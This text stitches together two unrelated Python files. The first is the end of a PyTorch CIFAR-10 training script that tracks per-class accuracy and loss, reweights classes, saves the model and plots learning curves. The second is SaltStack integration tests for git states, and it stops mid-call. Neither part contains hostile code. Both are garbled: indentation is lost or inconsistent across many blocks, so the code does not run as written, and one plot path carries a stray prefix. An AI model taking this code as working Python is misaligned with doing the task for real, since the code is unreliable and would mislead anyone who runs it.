train_total_acc_list.append(total_accuracy)
train_ave_class_acc_list.append(ave_class_accuracy)
train_std_class_acc_list.append(std_class_accuracy)
# --------------------------------------------------------------------
    # performance testing for all test data
test_running_loss = 0.0
correct_pred = {classname: 0 for classname in classes}
total_pred = {classname: 0 for classname in classes}
test_class_loss = torch.zeros(MaxNoClasses)
with torch.no_grad():
for data in testloader:
images, labels = data
images, labels = images.to(device), labels.to(device)
outputs = net(images)
            criterion = nn.CrossEntropyLoss(weight=class_weights, reduction='none')  # per-sample losses
loss = criterion(outputs, labels)
            for label, one_loss in zip(labels, loss):
                test_class_loss = test_class_loss.to(device)
                test_class_loss[label] = test_class_loss[label] + one_loss
loss=sum(loss)
test_running_loss += loss.item()
_, predictions = torch.max(outputs, 1)
for label, prediction in zip(labels, predictions):
if label == prediction:
correct_pred[classes[label]] += 1
total_pred[classes[label]] += 1
test_running_loss=test_running_loss / MaxNoTestSamples
print('Test ',epoch + 1, test_running_loss, LR)
test_loss_list.append(test_running_loss)
# total and class accuracy
sum_correct_count = 0
sum_class_accuracy = 0
sum_class_acc_sq = 0
sum_total_count = 0
# get class accuracy
ii=0
test_class_acc_list.append([0,0,0,0,0,0,0,0,0,0])
for classname, correct_count in correct_pred.items():
accuracy = 100 * float(correct_count) / total_pred[classname]
sum_class_accuracy += accuracy
sum_class_acc_sq += accuracy * accuracy
#weighted accuracy
#sum_total_count += total_pred[classname]
sum_correct_count += correct_count
test_class_acc_list[iepoch][ii] = accuracy
ii += 1
#print(" Accuracy for class {:5s} is: {:.1f} %".format(classname,accuracy), end='')
print(' ',accuracy, end='')
print('')
    # average of class accuracies
ave_class_accuracy = sum_class_accuracy / len(classes)
std_class_accuracy = math.sqrt(sum_class_acc_sq / len(classes) - ave_class_accuracy * ave_class_accuracy)
    # weighted accuracy
total_accuracy = 100*float(sum_correct_count) /MaxNoTestSamples
print(" Average Class Accuracy is: {:.1f} %".format(ave_class_accuracy))
print(" STD of Class Accuracy is: {:.1f} %".format(std_class_accuracy))
print(" Weighted Accuracy is: {:.1f} %".format(total_accuracy))
test_total_acc_list.append(total_accuracy)
test_ave_class_acc_list.append(ave_class_accuracy)
test_std_class_acc_list.append(std_class_accuracy)
# prepare for the next epoch
iepoch +=1
    train_class_loss_list.append(train_class_loss.detach().cpu())
    test_class_loss_list.append(test_class_loss.detach().cpu())
with torch.no_grad():
dummy = train_class_loss ** beta
dummy = dummy/sum(dummy)
class_weights = (1 - gamma) * dummy + gamma * class_weights
print('Finished Training: '+ PATH)
# save state_dict
torch.save(net.state_dict(), PATH_A)
# load state_dict
net = Net()
#net=TheModelClass(*args, **kwargs)
net.load_state_dict(torch.load(PATH_A))
#net.eval()
# In[ ]:
# save each variables
'''
torch.save(train_loss_list,'train_loss_list'+PATH+'.pth')
torch.save(test_loss_list,'test_loss_list'+PATH+'.pth')
torch.save(train_class_loss_list,'train_class_loss_list'+PATH+'.pth')
torch.save(test_class_loss_list,'test_class_loss_list'+PATH+'.pth')
torch.save(train_total_acc_list,'train_total_acc_list'+PATH+'.pth')
torch.save(test_total_acc_list,'test_total_acc_list'+PATH+'.pth')
torch.save(train_ave_class_acc_list,'train_ave_class_acc_list'+PATH+'.pth')
torch.save(test_ave_class_acc_list,'test_ave_class_acc_list'+PATH+'.pth')
torch.save(train_std_class_acc_list,'train_std_class_acc_list'+PATH+'.pth')
torch.save(test_std_class_acc_list,'test_std_class_acc_list'+PATH+'.pth')
# load each variables
train_loss_list=torch.load('train_loss_list'+PATH+'.pth')
test_loss_list=torch.load('test_loss_list'+PATH+'.pth')
train_class_loss_list=torch.load('train_class_loss_list'+PATH+'.pth')
test_class_loss_list=torch.load('test_class_loss_list'+PATH+'.pth')
train_total_acc_list=torch.load('train_total_acc_list'+PATH+'.pth')
test_total_acc_list=torch.load('test_total_acc_list'+PATH+'.pth')
train_ave_class_acc_list=torch.load('train_ave_class_acc_list'+PATH+'.pth')
test_ave_class_acc_list=torch.load('test_ave_class_acc_list'+PATH+'.pth')
train_std_class_acc_list=torch.load('train_std_class_acc_list'+PATH+'.pth')
test_std_class_acc_list=torch.load('test_std_class_acc_list'+PATH+'.pth')
'''
# Plot loss learning curves
x = np.arange(1,MaxEpoch+1,1)
fig, ax =plt.subplots()
ax.plot(x,train_loss_list,'r',label='Total Loss for Train Data')
ax.plot(x,test_loss_list,'g',label='Total Loss for Test Data')
legend = ax.legend(loc='upper right', shadow=False, fontsize='small')
ax.set(xlabel='Epoch', ylabel='Loss',
title='Training and Test Loss during Learning')
fig.savefig(PLOT_PATH+"PLOT_PATHLearning Loss Curves-"+PATH+'.png',dpi=200)
# In[ ]:
# Plot accuracy learning curves
x = np.arange(1,MaxEpoch+1,1)
fig, ax =plt.subplots()
ax.plot(x,train_total_acc_list,'r',label='Total Acc for Train Data')
ax.plot(x,test_total_acc_list,'g',label='Total Acc for Test Data')
ax.plot(x,train_ave_class_acc_list,'r--',label='Ave Accuracy for Train Data')
ax.plot(x,test_ave_class_acc_list,'g--',label='Ave Accuracy for Test Data')
ax.plot(x,train_std_class_acc_list,'r:',label='Std Acc for Train Data')
ax.plot(x,test_std_class_acc_list,'g:',label='Std Acc for Test Data')
legend = ax.legend(loc='center right', shadow=False, fontsize='small')
ax.set(xlabel='Epoch', ylabel='Accuracy (%)',
title='Total, Average, and STD Accuracies during Learning')
fig.savefig(PLOT_PATH+"Learning Accuracy Curves: " +PATH+'.png',dpi=200)
# In[ ]:
# Plot class accuracy learning curves
x = np.arange(1,MaxEpoch+1,1)
fig, ax =plt.subplots()
trans_list=np.transpose(train_class_acc_list)
ax.plot(x,trans_list[0],'#8c564b',label='plane')
ax.plot(x,trans_list[1],'#d62728',label='car')
ax.plot(x,trans_list[2],'#ff7f0e',label='bird')
ax.plot(x,trans_list[3],'#bcbd22',label='cat')
ax.plot(x,trans_list[4],'#2ca02c',label='deer')
ax.plot(x,trans_list[5],'#17becf',label='dog')
ax.plot(x,trans_list[6],'#1f77b4',label='frog')
ax.plot(x,trans_list[7],'#9467bd',label='horse')
ax.plot(x,trans_list[8],'#e377c2',label='ship')
ax.plot(x,trans_list[9],'#7f7f7f',label='truck')
legend = ax.legend(loc='upper left', shadow=False, fontsize='small')
ax.set(xlabel='Epoch', ylabel='Class Accuracy (%)',
title='Class Accuracies during Learning for Training Data')
fig.savefig(PLOT_PATH+"Learning Class Accuracy Curves for Training Data: " +PATH+'.png',dpi=200)
# In[ ]:
# Plot class accuracy learning curves
x = np.arange(1,MaxEpoch+1,1)
fig, ax =plt.subplots()
trans_list=np.transpose(test_class_acc_list)
ax.plot(x,trans_list[0],'#8c564b',label='plane')
ax.plot(x,trans_list[1],'#d62728',label='car')
ax.plot(x,trans_list[2],'#ff7f0e',label='bird')
ax.plot(x,trans_list[3],'#bcbd22',label='cat')
ax.plot(x,trans_list[4],'#2ca02c',label='deer')
ax.plot(x,trans_list[5],'#17becf',label='dog')
ax.plot(x,trans_list[6],'#1f77b4',label='frog')
ax.plot(x,trans_list[7],'#9467bd',label='horse')
ax.plot(x,trans_list[8],'#e377c2',label='ship')
ax.plot(x,trans_list[9],'#7f7f7f',label='truck')
legend = ax.legend(loc='upper left', shadow=False, fontsize='small')
ax.set(xlabel='Epoch', ylabel='Class Accuracy (%)',
       title='Class Accuracies during Learning for Test Data')
fig.savefig(PLOT_PATH+"Learning Class Accuracy Curves for Test Data: " +PATH+'.png',dpi=200)
# In[ ]:
# Plot class loss learning curves
x = np.arange(1,MaxEpoch+1,1)
fig, ax =plt.subplots()
trans_list=np.transpose(train_class_loss_list)
ax.plot(x,trans_list[0],'#8c564b',label='plane')
ax.plot(x,trans_list[1],'#d62728',label='car')
ax.plot(x,trans_list[2],'#ff7f0e',label='bird')
ax.plot(x,trans_list[3],'#bcbd22',label='cat')
ax.plot(x,trans_list[4],'#2ca02c',label='deer')
ax.plot(x,trans_list[5],'#17becf',label='dog')
ax.plot(x,trans_list[6],'#1f77b4',label='frog')
ax.plot(x,trans_list[7],'#9467bd',label='horse')
ax.plot(x,trans_list[8],'#e377c2',label='ship')
ax.plot(x,trans_list[9],'#7f7f7f',label='truck')
legend = ax.legend(loc='upper left', shadow=False, fontsize='small')
ax.set(xlabel='Epoch', ylabel='Class Loss',
title='Class Loss during Learning for Training Data')
fig.savefig(PLOT_PATH+"Class Loss Curves for Training Data: " +PATH+'.png',dpi=200)
# In[ ]:
# Plot class loss learning curves
x = np.arange(1,MaxEpoch+1,1)
fig, ax =plt.subplots()
trans_list=np.transpose(test_class_loss_list)
ax.plot(x,trans_list[0],'#8c564b',label='plane')
ax.plot(x,trans_list[1],'#d62728',label='car')
ax.plot(x,trans_list[2],'#ff7f0e',label='bird')
ax.plot(x,trans_list[3],'#bcbd22',label='cat')
ax.plot(x,trans_list[4],'#2ca02c',label='deer')
ax.plot(x,trans_list[5],'#17becf',label='dog')
ax.plot(x,trans_list[6],'#1f77b4',label='frog')
ax.plot(x,trans_list[7],'#9467bd',label='horse')
ax.plot(x,trans_list[8],'#e377c2',label='ship')
ax.plot(x,trans_list[9],'#7f7f7f',label='truck')
legend = ax.legend(loc='upper left', shadow=False, fontsize='small')
ax.set(xlabel='Epoch', ylabel='Class Loss',
title='Class Loss during Learning for Test Data')
fig.savefig(PLOT_PATH+"Class Loss Curves for Test Data: " +PATH+'.png',dpi=200)
# save entire model
torch.save(net,PATH_A)
# load entire model
#APath='dr00h20'
model=torch.load(PATH_A)
model.eval()
best_loss = min(test_loss_list)
best_ind = test_loss_list.index(best_loss)
print('Min Test Loss: Train/Test Ave/STD Acc: ', train_ave_class_acc_list[best_ind],
      test_ave_class_acc_list[best_ind], train_std_class_acc_list[best_ind], test_std_class_acc_list[best_ind])
max_loss=max(test_ave_class_acc_list)
max_ind=test_ave_class_acc_list.index(max_loss)
print('Max Test Ave: Train/Test Ave/STD Acc: ', train_ave_class_acc_list[max_ind],
test_ave_class_acc_list[max_ind], train_std_class_acc_list[max_ind],test_std_class_acc_list[max_ind])
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# If a CUDA device is available, the following prints the CUDA device:
print(device)
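# --- Hedged evaluation sketch (illustrative only) ---
# confusion_matrix is imported above but never used; this is one way the
# reloaded model could be evaluated over the test set. Safe to remove.
all_preds, all_labels = [], []
model = model.to(device)
with torch.no_grad():
    for images, labels in testloader:
        images = images.to(device)
        outputs = model(images)
        all_preds.extend(outputs.argmax(dim=1).cpu().tolist())
        all_labels.extend(labels.tolist())
print(confusion_matrix(all_labels, all_preds))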
|
# -*- coding: utf-8 -*-
'''
Tests for the Git state
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import functools
import inspect
import os
import shutil
import socket
import string
import tempfile
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir
from tests.support.mixins import SaltReturnAssertsMixin
from tests.support.paths import TMP
# Import salt libs
import salt.utils.files
import salt.utils.path
from salt.utils.versions import LooseVersion as _LooseVersion
from salt.ext.six.moves.urllib.parse import urlparse # pylint: disable=no-name-in-module
TEST_REPO = 'https://github.com/saltstack/salt-test-repo.git'
def __check_git_version(caller, min_version, skip_msg):
'''
Common logic for version check
'''
if inspect.isclass(caller):
actual_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if not salt.utils.path.which('git'):
self.skipTest('git is not installed')
git_version = self.run_function('git.version')
if _LooseVersion(git_version) < _LooseVersion(min_version):
self.skipTest(skip_msg.format(min_version, git_version))
if actual_setup is not None:
actual_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
@functools.wraps(caller)
def wrapper(self, *args, **kwargs):
if not salt.utils.path.which('git'):
self.skipTest('git is not installed')
git_version = self.run_function('git.version')
if _LooseVersion(git_version) < _LooseVersion(min_version):
self.skipTest(skip_msg.format(min_version, git_version))
return caller(self, *args, **kwargs)
return wrapper
def ensure_min_git(caller=None, min_version='1.6.5'):
'''
Skip test if minimum supported git version is not installed
'''
if caller is None:
return functools.partial(ensure_min_git, min_version=min_version)
return __check_git_version(
caller,
min_version,
'git {0} or newer required to run this test (detected {1})'
)
def uses_git_opts(caller):
'''
Skip test if git_opts is not supported
IMPORTANT! This decorator should be at the bottom of any decorators added
to a given function.
'''
min_version = '1.7.2'
return __check_git_version(
caller,
min_version,
'git_opts only supported in git {0} and newer (detected {1})'
)
class WithGitMirror(object):
def __init__(self, repo_url, **kwargs):
self.repo_url = repo_url
if 'dir' not in kwargs:
kwargs['dir'] = TMP
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs) # pylint: disable=W0108
)
def wrap(self, testcase, *args, **kwargs):
# Get temp dir paths
mirror_dir = tempfile.mkdtemp(**self.kwargs)
admin_dir = tempfile.mkdtemp(**self.kwargs)
clone_dir = tempfile.mkdtemp(**self.kwargs)
# Clean up the directories, we want git to actually create them
os.rmdir(mirror_dir)
os.rmdir(admin_dir)
os.rmdir(clone_dir)
# Create a URL to clone
mirror_url = 'file://' + mirror_dir
# Mirror the repo
testcase.run_function(
'git.clone', [mirror_dir], url=TEST_REPO, opts='--mirror')
# Make sure the directory for the mirror now exists
assert os.path.exists(mirror_dir)
# Clone to the admin dir
ret = testcase.run_state('git.latest', name=mirror_url, target=admin_dir)
ret = ret[next(iter(ret))]
assert os.path.exists(admin_dir)
try:
# Run the actual function with three arguments added:
# 1. URL for the test to use to clone
# 2. Cloned admin dir for making/pushing changes to the mirror
            # 3. Yet-nonexistent clone_dir for the test function to use as a
# destination for cloning.
return self.func(testcase, mirror_url, admin_dir, clone_dir, *args, **kwargs)
finally:
shutil.rmtree(mirror_dir, ignore_errors=True)
shutil.rmtree(admin_dir, ignore_errors=True)
shutil.rmtree(clone_dir, ignore_errors=True)
with_git_mirror = WithGitMirror
@ensure_min_git
class GitTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the git state
'''
def setUp(self):
domain = urlparse(TEST_REPO).netloc
try:
if hasattr(socket, 'setdefaulttimeout'):
# 10 second dns timeout
socket.setdefaulttimeout(10)
socket.gethostbyname(domain)
except socket.error:
msg = 'error resolving {0}, possible network issue?'
self.skipTest(msg.format(domain))
def tearDown(self):
# Reset the dns timeout after the test is over
socket.setdefaulttimeout(None)
def _head(self, cwd):
return self.run_function('git.rev_parse', [cwd, 'HEAD'])
@with_tempdir(create=False)
def test_latest(self, target):
'''
git.latest
'''
ret = self.run_state(
'git.latest',
name=TEST_REPO,
target=target
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
@with_tempdir(create=False)
def test_latest_with_rev_and_submodules(self, target):
'''
git.latest
'''
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev='develop',
target=target,
submodules=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
@with_tempdir(create=False)
def test_latest_failure(self, target):
'''
git.latest
'''
ret = self.run_state(
'git.latest',
name='https://youSpelledGitHubWrong.com/saltstack/salt-test-repo.git',
rev='develop',
target=target,
submodules=True
)
self.assertSaltFalseReturn(ret)
self.assertFalse(os.path.isdir(os.path.join(target, '.git')))
@with_tempdir()
def test_latest_empty_dir(self, target):
'''
git.latest
'''
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev='develop',
target=target,
submodules=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
@with_tempdir(create=False)
def test_latest_unless_no_cwd_issue_6800(self, target):
'''
cwd=target was being passed to _run_check which blew up if
target dir did not already exist.
'''
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev='develop',
target=target,
unless='test -e {0}'.format(target),
submodules=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
@with_tempdir(create=False)
def test_numeric_rev(self, target):
'''
git.latest with numeric revision
'''
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev=0.11,
target=target,
submodules=True,
timeout=120
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
@with_tempdir(create=False)
def test_latest_with_local_changes(self, target):
'''
Ensure that we fail the state when there are local changes and succeed
when force_reset is True.
'''
# Clone repo
ret = self.run_state(
'git.latest',
name=TEST_REPO,
target=target
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
# Make change to LICENSE file.
with salt.utils.files.fopen(os.path.join(target, 'LICENSE'), 'a') as fp_:
fp_.write('Lorem ipsum dolor blah blah blah....\n')
# Make sure that we now have uncommitted changes
self.assertTrue(self.run_function('git.diff', [target, 'HEAD']))
# Re-run state with force_reset=False
ret = self.run_state(
'git.latest',
name=TEST_REPO,
target=target,
force_reset=False
)
self.assertSaltTrueReturn(ret)
self.assertEqual(
ret[next(iter(ret))]['comment'],
('Repository {0} is up-to-date, but with uncommitted changes. '
'Set \'force_reset\' to True to purge uncommitted changes.'
.format(target))
)
# Now run the state with force_reset=True
ret = self.run_state(
'git.latest',
name=TEST_REPO,
target=target,
force_reset=True
)
self.assertSaltTrueReturn(ret)
# Make sure that we no longer have uncommitted changes
self.assertFalse(self.run_function('git.diff', [target, 'HEAD']))
@with_git_mirror(TEST_REPO)
@uses_git_opts
def test_latest_fast_forward(self, mirror_url, admin_dir, clone_dir):
'''
Test running git.latest state a second time after changes have been
made to the remote repo.
'''
# Clone the repo
ret = self.run_state('git.latest', name=mirror_url, target=clone_dir)
ret = ret[next(iter(ret))]
assert ret['result']
# Make a change to the repo by editing the file in the admin copy
# of the repo and committing.
head_pre = self._head(admin_dir)
with salt.utils.files.fopen(os.path.join(admin_dir, 'LICENSE'), 'a') as fp_:
fp_.write('Hello world!')
self.run_function(
'git.commit', [admin_dir, 'added a line'],
git_opts='-c user.name="Foo Bar" -c user.email=foo@bar.com',
opts='-a',
)
# Make sure HEAD is pointing to a new SHA so we know we properly
# committed our change.
head_post = self._head(admin_dir)
assert head_pre != head_post
# Push the change to the mirror
# NOTE: the test will fail if the salt-test-repo's default branch
# is changed.
self.run_function('git.push', [admin_dir, 'origin', 'develop'])
# Re-run the git.latest state on the clone_dir
ret = self.run_state('git.latest', name=mirror_url, target=clone_dir)
ret = ret[next(iter(ret))]
assert ret['result']
# Make sure that the clone_dir now has the correct SHA
assert head_post == self._head(clone_dir)
@with_tempdir(create=False)
def _changed_local_branch_helper(self, target, rev, hint):
'''
We're testing two almost identical cases, the only thing that differs
is the rev used for the git.latest state.
'''
# Clone repo
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev=rev,
target=target
)
self.assertSaltTrueReturn(ret)
# Check out a new branch in the clone and make a commit, to ensure
# that when we re-run the state, it is not a fast-forward change
self.run_function('git.checkout', [target, 'new_branch'], opts='-b')
with salt.utils.files.fopen(os.path.join(target, 'foo'), 'w'):
pass
self.run_function('git.add', [target, '.'])
self.run_function(
'git.commit', [target, 'add file'],
git_opts='-c user.name="Foo Bar" -c user.email=foo@bar.com',
)
# Re-run the state, this should fail with a specific hint in the
# comment field.
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev=rev,
target=target
)
self.assertSaltFalseReturn(ret)
comment = ret[next(iter(ret))]['comment']
self.assertTrue(hint in comment)
@uses_git_opts
def test_latest_changed_local_branch_rev_head(self):
'''
Test for presence of hint in failure message when the local branch has
        been changed and the rev is set to HEAD
This test will fail if the default branch for the salt-test-repo is
ever changed.
'''
self._changed_local_branch_helper( # pylint: disable=no-value-for-parameter
'HEAD',
'The default remote branch (develop) differs from the local '
'branch (new_branch)'
)
@uses_git_opts
def test_latest_changed_local_branch_rev_develop(self):
'''
Test for presence of hint in failure message when the local branch has
been changed and a non-HEAD rev is specified
'''
self._changed_local_branch_helper( # pylint: disable=no-value-for-parameter
'develop',
'The desired rev (develop) differs from the name of the local '
'branch (new_branch)'
)
@uses_git_opts
@with_tempdir(create=False)
@with_tempdir()
def test_latest_updated_remote_rev(self, name, target):
'''
Ensure that we don't exit early when checking for a fast-forward
'''
# Initialize a new git repository
self.run_function('git.init', [name])
# Add and commit a file
with salt.utils.files.fopen(os.path.join(name, 'foo.txt'), 'w') as fp_:
fp_.write('Hello world\n')
self.run_function('git.add', [name, '.'])
self.run_function(
'git.commit', [name, 'initial commit'],
git_opts='-c user.name="Foo Bar" -c user.email=foo@bar.com',
)
# Run the state to clone the repo we just created
ret = self.run_state(
'git.latest',
name=name,
target=target,
)
self.assertSaltTrueReturn(ret)
# Add another commit
with salt.utils.files.fopen(os.path.join(name, 'foo.txt'), 'w') as fp_:
fp_.write('Added a line\n')
self.run_function(
'git.commit', [name, 'added a line'],
git_opts='-c user.name="Foo Bar" -c user.email=foo@bar.com',
opts='-a',
)
# Run the state again. It should pass, if it doesn't then there was
# a problem checking whether or not the change is a fast-forward.
ret = self.run_state(
'git.latest',
name=name,
target=target,
)
self.assertSaltTrueReturn(ret)
@with_tempdir(create=False)
def test_latest_depth(self, target):
'''
Test running git.latest state using the "depth" argument to limit the
history. See #45394.
'''
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev='HEAD',
target=target,
depth=1
)
# HEAD is not a branch, this should fail
self.assertSaltFalseReturn(ret)
self.assertIn(
'must be set to the name of a branch',
ret[next(iter(ret))]['comment']
)
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev='non-default-branch',
target=target,
depth=1
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
@with_git_mirror(TEST_REPO)
@uses_git_opts
def test_latest_sync_tags(self, mirror_url, admin_dir, clone_dir):
'''
Test that a removed tag is properly reported as such and removed in the
local clone, and that new tags are reported as new.
'''
tag1 = 'mytag1'
tag2 = 'mytag2'
# Add and push a tag
self.run_function('git.tag', [admin_dir, tag1])
self.run_function('git.push', [admin_dir, 'origin', tag1])
# Clone the repo
ret = self.run_state('git.latest', name=mirror_url, target=clone_dir)
ret = ret[next(iter(ret))]
assert ret['result']
# Now remove the tag
self.run_function('git.push', [admin_dir, 'origin', ':{0}'.format(tag1)])
# Add and push another tag
self.run_function('git.tag', [admin_dir, tag2])
self.run_function('git.push', [admin_dir, 'origin', tag2])
# Re-run the state with sync_tags=False. This should NOT delete the tag
# from the local clone, but should report that a tag has been added.
ret = self.run_state('git.latest',
name=mirror_url,
target=clone_dir,
sync_tags=False)
ret = ret[next(iter(ret))]
assert ret['result']
# Make ABSOLUTELY SURE both tags are present, since we shouldn't have
# removed tag1.
all_tags = self.run_function('git.list_tags', [clone_dir])
assert tag1 in all_tags
assert tag2 in all_tags
# Make sure the reported changes are correct
expected_changes = {'new_tags': [tag2]}
assert ret['changes'] == expected_changes, ret['changes']
# Re-run the state with sync_tags=True. This should remove the local
# tag, since it doesn't exist in the remote repository.
ret = self.run_state('git.latest',
name=mirror_url,
target=clone_dir,
sync_tags=True)
ret = ret[next(iter(ret))]
assert ret['result']
# Make ABSOLUTELY SURE the expected tags are present/gone
all_tags = self.run_function('git.list_tags', [clone_dir])
assert tag1 not in all_tags
assert tag2 in all_tags
# Make sure the reported changes are correct
expected_changes = {'deleted_tags': [tag1]}
assert ret['changes'] == expected_changes, ret['changes']
@with_tempdir(create=False)
def test_cloned(self, target):
'''
Test git.cloned state
'''
# Test mode
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
test=True)
ret = ret[next(iter(ret))]
assert ret['result'] is None
assert ret['changes'] == {
'new': '{0} => {1}'.format(TEST_REPO, target)
}
assert ret['comment'] == '{0} would be cloned to {1}'.format(
TEST_REPO,
target
)
# Now actually run the state
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert ret['changes'] == {
'new': '{0} => {1}'.format(TEST_REPO, target)
}
assert ret['comment'] == '{0} cloned to {1}'.format(TEST_REPO, target)
# Run the state again to test idempotence
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert not ret['changes']
assert ret['comment'] == 'Repository already exists at {0}'.format(target)
# Run the state again to test idempotence (test mode)
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
test=True)
ret = ret[next(iter(ret))]
assert not ret['changes']
assert ret['result'] is True
assert ret['comment'] == 'Repository already exists at {0}'.format(target)
@with_tempdir(create=False)
def test_cloned_with_branch(self, target):
'''
Test git.cloned state with branch provided
'''
old_branch = 'master'
new_branch = 'develop'
bad_branch = 'thisbranchdoesnotexist'
# Test mode
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=old_branch,
test=True)
ret = ret[next(iter(ret))]
assert ret['result'] is None
assert ret['changes'] == {
'new': '{0} => {1}'.format(TEST_REPO, target)
}
assert ret['comment'] == (
'{0} would be cloned to {1} with branch \'{2}\''.format(
TEST_REPO,
target,
old_branch
)
)
# Now actually run the state
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=old_branch)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert ret['changes'] == {
'new': '{0} => {1}'.format(TEST_REPO, target)
}
assert ret['comment'] == (
'{0} cloned to {1} with branch \'{2}\''.format(
TEST_REPO,
target,
old_branch
)
)
# Run the state again to test idempotence
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=old_branch)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert not ret['changes']
assert ret['comment'] == (
'Repository already exists at {0} '
'and is checked out to branch \'{1}\''.format(target, old_branch)
)
# Run the state again to test idempotence (test mode)
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
test=True,
branch=old_branch)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert not ret['changes']
assert ret['comment'] == (
'Repository already exists at {0} '
'and is checked out to branch \'{1}\''.format(target, old_branch)
)
# Change branch (test mode)
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=new_branch,
test=True)
ret = ret[next(iter(ret))]
assert ret['result'] is None
assert ret['changes'] == {
'branch': {'old': old_branch, 'new': new_branch}
}
assert ret['comment'] == 'Branch would be changed to \'{0}\''.format(
new_branch
)
# Now really change the branch
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=new_branch)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert ret['changes'] == {
'branch': {'old': old_branch, 'new': new_branch}
}
assert ret['comment'] == 'Branch changed to \'{0}\''.format(
new_branch
)
# Change back to original branch. This tests that we don't attempt to
# checkout a new branch (i.e. git checkout -b) for a branch that exists
# locally, as that would fail.
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=old_branch)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert ret['changes'] == {
'branch': {'old': new_branch, 'new': old_branch}
}
assert ret['comment'] == 'Branch changed to \'{0}\''.format(
old_branch
)
        # Test switching to a nonexistent branch. This should fail.
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=bad_branch)
ret = ret[next(iter(ret))]
assert ret['result'] is False
assert not ret['changes']
assert ret['comment'].startswith(
'Failed to change branch to \'{0}\':'.format(bad_branch)
)
@with_tempdir(create=False)
@ensure_min_git(min_version='1.7.10')
def test_cloned_with_nonexistant_branch(self, target):
'''
        Test git.cloned state with a nonexistent branch provided
'''
branch = 'thisbranchdoesnotexist'
# Test mode
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=branch,
test=True)
ret = ret[next(iter(ret))]
assert ret['result'] is None
assert ret['changes']
assert ret['comment'] == (
'{0} would be cloned to {1} with branch \'{2}\''.format(
TEST_REPO,
target,
branch
)
)
# Now actually run the state
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=branch)
ret = ret[next(iter(ret))]
assert ret['result'] is False
assert not ret['changes']
assert ret['comment'].startswith('Clone failed:')
assert 'not found in upstream origin' in ret['comment']
@with_tempdir(create=False)
def test_present(self, name):
'''
git.present
'''
ret = self.run_state(
'git.present',
name=name,
bare=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(os.path.join(name, 'HEAD')))
@with_tempdir()
def test_present_failure(self, name):
'''
git.present
'''
fname = os.path.join(name, 'stoptheprocess')
with salt.utils.files.fopen(fname, 'a'):
pass
ret = self.run_state(
'git.present',
name=name,
bare=True
)
self.assertSaltFalseReturn(ret)
self.assertFalse(os.path.isfile(os.path.join(name, 'HEAD')))
@with_tempdir()
def test_present_empty_dir(self, name):
'''
git.present
'''
ret = self.run_state(
'git.present',
name=name,
bare=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(os.path.join(name, 'HEAD')))
@with_tempdir()
def test_config_set_value_with_space_character(self, name):
'''
git.config
'''
self.run_function('git.init', [name])
ret = self.run_state(
'git.config_set',
name='user.name',
value='foo bar',
repo=name,
**{'global': False})
self.assertSaltTrueReturn(ret)
@ensure_min_git
@uses_git_opts
class LocalRepoGitTest(ModuleCase, SaltReturnAssertsMixin):
'''
    Tests which do not require connectivity to github.com
'''
def setUp(self):
self.repo = tempfile.mkdtemp(dir=TMP)
self.admin = tempfile.mkdtemp(dir=TMP)
self.target = tempfile.mkdtemp(dir=TMP)
for dirname in (self.repo, self.admin, self.target):
self.addCleanup(shutil.rmtree, dirname, ignore_errors=True)
# Create bare repo
self.run_function('git.init', [self.repo], bare=True)
# Clone bare repo
self.run_function('git.clone', [self.admin], url=self.repo)
self._commit(self.admin, '', message='initial commit')
self._push(self.admin)
def _commit(self, repo_path, content, message):
with salt.utils.files.fopen(os.path.join(repo_path, 'foo'), 'a') as fp_:
fp_.write(content)
self.run_function('git.add', [repo_path, '.'])
self.run_function(
'git.commit', [repo_path, message],
